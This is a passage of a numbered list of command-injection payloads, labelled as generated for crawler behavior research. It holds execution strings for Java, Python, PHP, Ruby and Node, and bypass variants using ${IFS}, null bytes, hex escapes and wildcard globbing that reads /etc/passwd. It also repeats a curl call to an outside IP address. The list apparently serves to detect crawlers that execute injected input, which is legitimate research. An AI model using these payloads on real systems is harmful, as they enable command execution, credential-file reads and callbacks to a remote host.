w919 [Lang] cmd=Runtime.getRuntime().exec('echo q919')
w920 [Lang] cmd=__import__('os').system('echo q920')
w921 [Lang] val=eval('__import__("os").popen("id").read()')
w922 [Lang] x=system('echo q922')
w923 [Lang] data=passthru('echo q923')
w924 [Lang] ref=<?php system('echo q924'); ?>
w925 [Lang] exec=`echo q925`
w926 [Lang] cmd=%x(echo q926)
w927 [Lang] val=system('echo q927')
w928 [Lang] data=require('child_' + 'process').exec('echo q928')
w929 [Lang] cmd=Runtime.getRuntime().exec('echo q929')
w930 [Lang] cmd=__import__('os').system('echo q930')
w931 [Lang] val=eval('__import__("os").popen("id").read()')
w932 [Lang] x=system('echo q932')
w933 [Lang] data=passthru('echo q933')
w934 [Lang] ref=<?php system('echo q934'); ?>
w935 [Lang] exec=`echo q935`
w936 [Lang] cmd=%x(echo q936)
w937 [Lang] val=system('echo q937')
w938 [Lang] data=require('child_' + 'process').exec('echo q938')
w939 [Lang] cmd=Runtime.getRuntime().exec('echo q939')
w940 [Lang] cmd=__import__('os').system('echo q940')
w941 [Lang] val=eval('__import__("os").popen("id").read()')
w942 [Lang] x=system('echo q942')
w943 [Lang] data=passthru('echo q943')
w944 [Lang] ref=<?php system('echo q944'); ?>
w945 [Lang] exec=`echo q945`
w946 [Lang] cmd=%x(echo q946)
w947 [Lang] val=system('echo q947')
w948 [Lang] data=require('child_' + 'process').exec('echo q948')
w949 [Lang] cmd=Runtime.getRuntime().exec('echo q949')

Exotic / Bypass Variants

w950 [Exotic] val=echo q950
w951 [Exotic] cmd=%00echo q951
w952 [Exotic] data=echo q952
w953 [Exotic] test=%u0000echo q953
w954 [Exotic] x=echo q954
w955 [Exotic] name=echo${IFS}q955
w956 [Exotic] val=;echo${IFS}q956
w957 [Exotic] ref=/???/??t /???/p??s??
w958 [Exotic] cmd=$'\x65\x63\x68\x6f'$'\x20q958'
w959 [Exotic] data=curl 62.84.182.119:9999/q959
w960 [Exotic] val=echo q960
w961 [Exotic] cmd=%00echo q961
w962 [Exotic] data=echo q962
w963 [Exotic] test=%u0000echo q963
w964 [Exotic] x=echo q964
w965 [Exotic] name=echo${IFS}q965
w966 [Exotic] val=;echo${IFS}q966
w967 [Exotic] ref=/???/??t /???/p??s??
w968 [Exotic] cmd=$'\x65\x63\x68\x6f'$'\x20q968'
w969 [Exotic] data=curl 62.84.182.119:9999/q969
w970 [Exotic] val=echo q970
w971 [Exotic] cmd=%00echo q971
w972 [Exotic] data=echo q972
w973 [Exotic] test=%u0000echo q973
w974 [Exotic] x=echo q974
w975 [Exotic] name=echo${IFS}q975
w976 [Exotic] val=;echo${IFS}q976
w977 [Exotic] ref=/???/??t /???/p??s??
w978 [Exotic] cmd=$'\x65\x63\x68\x6f'$'\x20q978'
w979 [Exotic] data=curl 62.84.182.119:9999/q979
w980 [Exotic] val=echo q980
w981 [Exotic] cmd=%00echo q981
w982 [Exotic] data=echo q982
w983 [Exotic] test=%u0000echo q983
w984 [Exotic] x=echo q984
w985 [Exotic] name=echo${IFS}q985
w986 [Exotic] val=;echo${IFS}q986
w987 [Exotic] ref=/???/??t /???/p??s??
w988 [Exotic] cmd=$'\x65\x63\x68\x6f'$'\x20q988'
w989 [Exotic] data=curl 62.84.182.119:9999/q989
w990 [Exotic] val=echo q990
w991 [Exotic] cmd=%00echo q991
w992 [Exotic] data=echo q992
w993 [Exotic] test=%u0000echo q993
w994 [Exotic] x=echo q994
w995 [Exotic] name=echo${IFS}q995
w996 [Exotic] val=;echo${IFS}q996
w997 [Exotic] ref=/???/??t /???/p??s??
w998 [Exotic] cmd=$'\x65\x63\x68\x6f'$'\x20q998'
w999 [Exotic] data=curl 62.84.182.119:9999/q999

Generated for gematria.online crawler behavior research.